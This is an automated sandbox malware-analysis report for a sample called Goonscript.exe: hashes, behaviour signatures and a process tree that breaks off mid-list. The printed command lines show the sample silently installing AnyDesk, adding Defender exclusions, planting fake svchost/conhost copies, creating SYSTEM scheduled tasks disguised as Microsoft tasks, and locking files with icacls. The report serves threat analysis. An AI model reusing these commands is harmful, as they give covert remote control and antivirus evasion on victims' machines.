Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

Goonscript.exe

windows7-x64

8

Goonscript.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    1799s
  • max time network
    1794s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/07/2024, 01:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Goonscript.exe

  • Size

    6.9MB

  • MD5

    8bb727b07bc152ae905f3fb4ac0f2f76

  • SHA1

    e0e5b8de9c0d72cfbcb8f097faa7fe09de17dba8

  • SHA256

    61f681746ed31336dde667f4f68314291712fbb0d0df0f52d4919df5f94da088

  • SHA512

    a05ef5971a9fbeba950425512e699e0cac0873a9b6b2efaae32ee7364bd0d014d3e2bcf698931763f2f06c3567d08987c092bb86d61dea0001bc683572540f0e

  • SSDEEP

    98304:vAdMOtmUfXgtMR/31ppMwuRUS56WkhaYHkBYbUF6Hhsi/+GDRJ0ite5SKHrrMw+z:vUm44BjYHkBmU0sm70qiLLr7bae0vaK1

Score
8/10
discoveryevasionexecutionexploit

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Possible privilege escalation attempt 26 IoCs
    exploit
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 26 IoCs
    discovery
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 21 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 17 IoCs
  • Modifies registry key 1 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 41 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 12 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Goonscript.exe
    "C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\system32\wscript.exe
      "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\9700.tmp\9701.tmp\9702.vbs //Nologo
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Users\Admin\AppData\Roaming\doorbell-upd5.exe
        "C:\Users\Admin\AppData\Roaming\doorbell-upd5.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9904.tmp\9914.tmp\9915.bat C:\Users\Admin\AppData\Roaming\doorbell-upd5.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2200
          • C:\Windows\system32\takeown.exe
            takeown /f "C:\programdata\stn.exe"
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:5068
          • C:\Windows\system32\icacls.exe
            icacls "C:\programdata\stn.exe" /reset
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4876
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c rm "C:\programdata\stn.exe" -r -force
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3364
          • \??\c:\users\Admin\downloads\AnyDesk.exe
            "c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2804
            • \??\c:\users\Admin\downloads\AnyDesk.exe
              "c:\users\Admin\downloads\AnyDesk.exe" --local-service
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4856
            • \??\c:\users\Admin\downloads\AnyDesk.exe
              "c:\users\Admin\downloads\AnyDesk.exe" --local-control
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1708
          • C:\ProgramData\AnyDesk.exe
            "C:\ProgramData/Anydesk.exe" --remove-password
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:512
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
            5⤵
              PID:5556
            • C:\ProgramData\AnyDesk.exe
              "C:\ProgramData/Anydesk.exe" --set-password
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5592
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:636
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5908
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:368
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6316
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData/microsoft/ksedynA.exe" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6416
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData/microsoft/nts.exe" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6864
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData/microsoft/tsohcvs.exe" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5504
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData/microsoft/tsohnoc.exe" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6344
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6540
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:6556
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:6988
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:6960
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:6016
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData/microsoft"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:5348
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:6404
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:6536
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:6916
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:216
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:5692
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:3168
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:5336
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:6180
            • C:\Windows\system32\schtasks.exe
              schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RI 0 /RL highest /SC ONLOGON /F
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:6540
            • C:\Windows\system32\schtasks.exe
              schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:6576
            • C:\Windows\system32\schtasks.exe
              schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:5860
            • C:\Windows\system32\schtasks.exe
              schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:5952
            • C:\Windows\system32\schtasks.exe
              schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
              5⤵
                PID:4580
              • C:\Windows\system32\schtasks.exe
                schtasks /run /tn "SystemTaskNavigator"
                5⤵
                  PID:6884
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/stn.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:6860
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6416
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6556
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/Anydesk.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:6916
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5676
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6952
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/svchost.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:1040
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5764
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6028
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/conhost.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:5428
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6956
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6056
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/stn.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:5648
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:216
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:1516
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/Anydesk.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:5144
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6424
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:1396
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/svchost.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:5140
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6960
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6012
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/conhost.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:5136
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6044
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6000
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/Anydesk.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:6360
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6016
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:7060
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/svchost.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:7056
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1332
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3324
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/conhost.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:6364
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6400
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6412
                • C:\Windows\system32\attrib.exe
                  attrib +r +s "C:\ProgramData/stn.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:6304
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:7028
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
                  5⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:6532
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
              3⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4744
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaa2346f8,0x7ffaaa234708,0x7ffaaa234718
                4⤵
                  PID:1848
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
                  4⤵
                    PID:2440
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4408
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
                    4⤵
                      PID:3640
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                      4⤵
                        PID:2796
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                        4⤵
                          PID:3864
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
                          4⤵
                            PID:224
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                            4⤵
                              PID:3800
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                              4⤵
                                PID:3524
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
                                4⤵
                                  PID:1664
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
                                  4⤵
                                    PID:3956
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
                                    4⤵
                                      PID:5400
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                                      4⤵
                                        PID:5444
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                        4⤵
                                          PID:5628
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:8
                                          4⤵
                                            PID:5704
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,8246665304336900500,6909032025433602600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 /prefetch:8
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5976
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
